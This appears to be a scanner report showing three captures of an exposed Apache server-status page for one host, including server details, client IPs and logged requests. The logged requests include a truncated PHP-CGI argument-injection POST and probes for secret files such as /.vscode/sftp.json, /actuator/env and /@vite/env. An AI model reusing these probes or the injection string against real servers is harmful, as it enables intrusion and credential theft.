167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-34339495460/6/43412_ 1.3294514418253550.00.191265.47 172.69.176.8h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-34339495490/1/41111_ 0.01930199585540.00.001249.97 206.189.2.13http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/1/40176_ 0.40890242416180.00.001186.79 198.41.231.97h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/6/40897_ 1.2888528264195630.00.071277.29 172.71.151.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/7/40091_ 1.3989493192389640.00.071214.68 162.158.108.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/3/40408_ 1.24880162516150.00.051403.03 162.158.82.160h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/8/40726_ 1.9140187139150.00.091200.35 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 2-34339495490/2/40340_ 1.248430179702230.00.001220.57 162.158.82.167h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/2/40571_ 1.354937188942370.00.021255.75 172.71.215.111h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/6/40670_ 1.87941194517130.00.291396.67 172.71.167.99h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-34339495490/7/40691_ 1.88930220818190.00.131273.67 198.41.227.175h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-34339495480/99/42873_ 7.2700247610680.02.351362.94 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-34339495480/93/41487W 7.2600199512600.01.641207.41 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-34339495480/89/42609_ 7.2630217961170.02.961355.38 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-34339495480/101/41885_ 7.2710260478120.02.041382.85 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-34339495480/87/41866_ 7.2710184495810.01.511267.56 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-34339495480/81/41903_ 7.2530187016300.02.171321.37 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-34339495480/102/42299_ 7.2630211787780.02.321406.51 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-34339495480/93/42365_ 7.2520289914800.04.851347.60 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-34339495480/107/41598_ 7.2720836284680.02.331313.07 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-34339495480/90/42799_ 7.2530329356260.01.991350.29 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-34339496820/112/37415_ 7.5000328439230.01.711203.25 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-34339496820/119/37501_ 7.5010197408920.03.291253.30 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-34339496820/126/37693_ 7.4830170752220.02.171283.67 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 4-34339496820/126/37992_ 7.4820175470110.01.931149.98 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-34339496820/116/37427_ 7.4800181930410.02.491146.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755bad9cefe
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 12-Nov-2025 22:24:28 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 336 Parent Server MPM Generation: 335 Server uptime: 61 days 10 hours 3 minutes 25 seconds Server load: 0.04 0.08 0.08 Total accesses: 1932743 - Total Traffic: 60.3 GB - Total Duration: 1114295764 CPU Usage: u144.34 s190.06 cu10605.2 cs5986.72 - .319% CPU load .364 requests/sec - 11.9 kB/second - 32.7 kB/request - 576.536 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03686685no1yes19000 13686686no0yes010000 23686687no0yes010000 33686688no0yes010000 43686818no0yes010000 Sum501 149000 _____W____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-33536866850/69/35964_ 6.0810282609210.09.731338.68 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 0-33536866850/78/35353_ 6.0810434887160.01.471204.02 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-33536866850/66/35697_ 6.0810150715830.01.361214.23 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-33536866850/71/35688_ 6.0820167862860.01.131248.71 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-33536866850/62/35932_ 5.993672156538530.01.761240.07 172.71.99.181h2lcftech.es:443idle, streams: 0/1/0/0/1 (open/recv/resp/push/rst) 0-33536866850/69/36048W 6.0800164967740.00.911233.86 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-33536866850/76/36133_ 6.0830233520090.01.561156.01 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-33536866850/66/35571_ 5.783345149495660.01.281207.81 104.23.166.149h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-33536866850/64/35931_ 6.0800159331280.01.851169.60 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-33536866850/65/35743_ 5.9500188148490.02.091278.37 104.22.7.118h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/45/42296_ 5.5612724179405220.01.861349.75 172.68.134.235h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/46/43012_ 5.72178206212649700.01.341364.77 162.158.10.214h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/37/42568_ 5.581730207144140.00.741329.89 172.68.134.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/38/42412_ 5.661320199069480.00.391295.47 74.7.230.16h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/43/43141_ 5.741320177770590.01.431380.53 162.158.230.174h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/41/43646_ 5.581750187434190.014.541295.87 172.68.135.188h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-33536866860/34/42925_ 3.9912765227141410.01.121311.49 104.23.166.145h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/53/43388_ 5.71173567180057200.01.221270.88 104.23.195.55h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/44/41666_ 5.711751288132500.04.051186.84 104.22.7.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-33536866860/36/43050_ 4.021793416784960.022.931246.73 172.68.211.48h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/7/38937_ 3.801740189911870.00.351158.08 172.68.134.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/6/37994_ 3.671792232990240.00.711088.14 172.68.135.162h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/6/38693_ 3.811790254525280.00.431209.36 162.159.99.24h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/9/37929_ 3.8720179802500.00.191136.37 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-33536866870/5/38158_ 3.181740152555410.00.631327.87 104.22.7.36h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/6/38527_ 3.7620175737580.00.651137.20 172.71.152.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/10/38314_ 2.621790170334550.00.381162.38 162.158.167.123h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/6/38350_ 3.72178374179942500.00.671138.97 172.70.130.241h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/4/38622_ 3.04178253181989250.00.161300.49 172.71.151.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-33536866870/11/38494_ 2.731790209938820.013.851195.97 104.23.237.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/14/41460_ 3.3440241756610.01.551308.13 172.70.174.188h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/11/40094_ 3.8940194028410.01.201176.71 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-33536866880/6/41155_ 3.851320211726870.00.011317.78 162.158.230.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/10/40502_ 3.111270254701400.00.841357.01 162.158.120.217h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/9/40501_ 3.211270178618580.00.781234.49 172.68.135.198h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/7/40561_ 3.8910181552350.00.131261.78 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-33536866880/6/40915_ 2.721320206283750.00.161358.92 198.41.230.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/7/40971_ 3.355190284250730.00.021316.03 172.70.34.174h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/7/40159_ 3.1821830378990.00.041281.13 188.114.111.210h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-33536866880/10/41404_ 3.8920322717440.00.601314.56 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-33536868180/124/35482_ 8.4310316913130.04.801146.39 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-33536868180/129/35523_ 8.4100187559490.02.741194.03 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-33536868180/117/35616_ 8.433295160582210.02.691223.78 162.158.88.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-33536868180/109/36015_ 8.4310165598540.04.301102.46 164.90.208.56http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-33536868180/109/35444_ 8.3020175404860.01.991084.08 172.68.55.186<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755d6793092
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 11-Nov-2025 00:28:51 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 326 Parent Server MPM Generation: 325 Server uptime: 59 days 12 hours 7 minutes 49 seconds Server load: 0.07 0.08 0.08 Total accesses: 1864368 - Total Traffic: 57.8 GB - Total Duration: 1069642580 CPU Usage: u164.39 s200.62 cu10239.7 cs5763.73 - .318% CPU load .363 requests/sec - 11.8 kB/second - 32.5 kB/request - 573.729 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03435778no0yes010000 13435914no0yes010000 23435779no0yes010000 33435776no1yes19000 43435777no0yes010000 Sum501 149000 ______________________________W___________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-32534357780/47/34872_ 8.7545270279456030.00.881305.73 172.70.224.194h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-32534357780/36/34328_ 8.7545260431929080.01.011168.77 172.70.224.194h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/41/34649_ 8.42452621147262940.01.041189.07 172.68.134.234h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/47/34635_ 8.759780165232190.013.811210.98 199.30.231.5http/1.1 0-32534357780/48/34927_ 8.2145270153875210.01.391196.43 172.68.102.19h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/42/35051_ 8.7545310161698090.00.521188.05 172.70.224.174h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/46/35077_ 8.7545320230621250.013.631105.37 172.70.224.181h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/43/34534_ 8.2245261146767910.00.741154.85 172.68.103.99h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-32534357780/41/34893_ 8.2145271156419230.01.321143.74 172.68.103.36h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-32534357780/38/34700_ 8.7545310185402490.00.391224.34 172.70.224.196h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/51/40390_ 9.569730173905440.01.471268.50 172.70.224.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/53/41008_ 9.749780206351740.00.741302.93 104.23.248.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/50/40680_ 9.559800199659670.01.091222.50 172.70.224.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/54/40437_ 9.569780192924270.01.231185.60 172.70.224.175h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/52/41252_ 10.709850172018700.01.241276.68 172.68.135.147h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/45/41770_ 9.559730180980310.01.011233.52 172.70.224.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/49/41077_ 10.709780220981170.01.561228.64 172.71.81.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/46/41552_ 10.709780174373520.02.161203.99 172.69.176.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-32534359140/49/39822_ 9.569730174976060.013.581143.80 172.70.224.189h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-32534359140/54/41127_ 9.539800408752200.01.461137.66 172.70.224.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/43/37810_ 6.279820186706130.01.131122.28 162.158.249.134h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/69/36787_ 11.11976257229886710.02.831044.32 172.68.19.120h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-32534357790/57/37541_ 11.15981240251402000.01.831156.47 172.68.135.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/63/36709_ 11.149870176012780.02.741076.04 172.68.135.76h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/87/37034_ 9.919780149005920.02.271289.57 172.70.224.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/64/37407_ 9.909820171403600.02.081117.52 172.70.224.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/61/37199_ 9.929730167030750.02.141138.42 172.70.224.141h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/61/37171_ 9.369730176583890.02.201120.55 172.68.103.151h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/58/37483_ 11.159780178648070.01.481238.75 172.71.152.11h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-32534357790/61/37333_ 11.11976551206316060.01.181149.38 172.68.19.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/291/40170W 18.3800237655360.04.581264.88 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-32534357760/305/38889_ 18.3910187293000.06.091132.17 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-32534357760/289/39866_ 18.3840197592910.06.241249.07 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-32534357760/318/39273_ 18.3910247316400.04.871271.84 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-32534357760/279/39248_ 18.364468168326280.05.101190.30 172.70.175.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/309/39265_ 18.284434176713470.03.761195.37 172.68.7.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-32534357760/298/39541_ 18.3900195313080.017.251332.44 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-32534357760/298/39589_ 18.3800275172700.020.161280.18 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-32534357760/287/38913_ 18.3840824411450.04.531238.02 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-32534357760/310/40078_ 18.315369317463140.04.551277.81 198.41.227.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-32534357770/331/34012_ 19.4810304086470.06.011094.72 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 4-32534357770/318/34085_ 19.4810146036870.04.411156.53 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-32534357770/348/34180_ 19.4800146811150.07.131174.30 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 4-32534357770/321/34504_ 19.4730161791180.06.101046.32 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-32534357770/337/33954_ 19.4820166837730.03.941060.06
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7552e2d39d3
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 08-Nov-2025 21:45:55 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 315 Parent Server MPM Generation: 314 Server uptime: 57 days 9 hours 24 minutes 52 seconds Server load: 0.14 0.14 0.10 Total accesses: 1807639 - Total Traffic: 56.2 GB - Total Duration: 1037931959 CPU Usage: u208.93 s221.82 cu9876.22 cs5537 - .32% CPU load .365 requests/sec - 11.9 kB/second - 32.6 kB/request - 574.192 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03208962no0yes010000 13208961no0yes010000 23209093no1yes010000 33208959no1yes19000 43208960no0yes010000 Sum502 149000 __________________________________W_______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-31432089620/28/34090_ 17.6268450270590460.00.461269.01 162.158.106.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/37/33546_ 18.15340420970850.00.531153.95 104.23.251.181h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/21/33844_ 17.02681144674150.00.911160.72 172.68.96.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/24/33821_ 18.1810155974040.00.711183.72 172.70.206.87h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/29/34148_ 17.98700142951360.00.901184.03 162.158.123.100h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/25/34264_ 18.18341159126560.01.881174.82 104.23.251.146h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/27/34249_ 17.611559222872870.01.151079.88 162.158.179.206h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-31432089620/24/33721_ 18.2110139662960.00.261127.27 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-31432089620/24/34074_ 18.2110151139820.00.491120.38 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-31432089620/33/33894_ 18.2039345176653850.00.901211.49 162.158.88.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/23/38913_ 16.45470501164423620.00.601235.72 104.23.175.17h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/31/39589_ 16.96820201231940.01.791278.58 172.69.34.218h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/26/39217_ 16.3476444194147560.00.601192.96 172.71.235.67h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/22/38942_ 15.13760188125390.00.881129.76 172.70.179.141h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/26/39766_ 16.9810166518810.02.521229.03 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 1-31432089610/26/40398_ 16.67764176535160.01.581210.02 104.23.251.203h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/22/39503_ 16.4181514214238110.00.511185.12 172.71.124.12h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-31432089610/17/40144_ 16.4181430166731820.00.341177.88 172.71.124.12h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/30/38343_ 16.96820164427970.00.751094.66 172.70.210.111h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-31432089610/18/39666_ 16.441467397460050.01.071100.35 104.23.223.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/650/35798_ 50.560300179853690.023.131058.32 172.64.220.136h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/641/34890_ 50.530315214826810.016.53997.83 172.64.220.136h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/656/35601_ 50.5800241435720.014.971072.58 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-31432090930/665/34814_ 50.5700168817710.014.86980.89 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-31432090930/653/35138_ 50.5710137779050.013.591250.45 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-31432090930/651/35530_ 50.54116157900560.013.251045.51 172.68.135.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/661/35307_ 50.5800156387880.020.251062.34 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-31432090930/618/35142_ 50.5700166052330.015.151075.50 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-31432090930/681/35569_ 50.531286160238150.014.181181.82 172.64.220.136h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-31432090930/623/35460_ 50.5710188121820.051.881104.03 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-31432089590/567/39488_ 40.5200235594410.013.101250.39 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-31432089590/585/38170_ 40.501164184819960.017.481118.37 162.158.6.60h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/554/39174_ 40.480200195755800.017.751232.03 162.158.49.27h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-31432089590/556/38604_ 40.5110242790520.019.601259.38 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-31432089590/606/38584W 40.4400166551530.018.861178.76 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-31432089590/554/38575_ 40.5100174809460.013.251184.26 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-31432089590/573/38859_ 40.5200193436020.018.261306.86 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-31432089590/597/38920_ 40.5100273525370.033.621252.21 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-31432089590/597/38256_ 40.5200822681420.016.011224.13 206.189.19.19http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-31432089590/550/39354_ 40.460364315630500.014.471263.21 162.158.49.27h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/60/33209_ 17.59700301263230.04.851057.67 172.68.152.148h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-31432089600/60/33277_ 18.34700143041520.03.911142.45 172.64.217.103h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/58/33361_ 17.59701143871410.04.531157.37 172.68.152.152h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-31432089600/55/33697_ 17.8374397159136360.05.921030.86 172.68.211.138h2tandemsl.com:443done, streams: 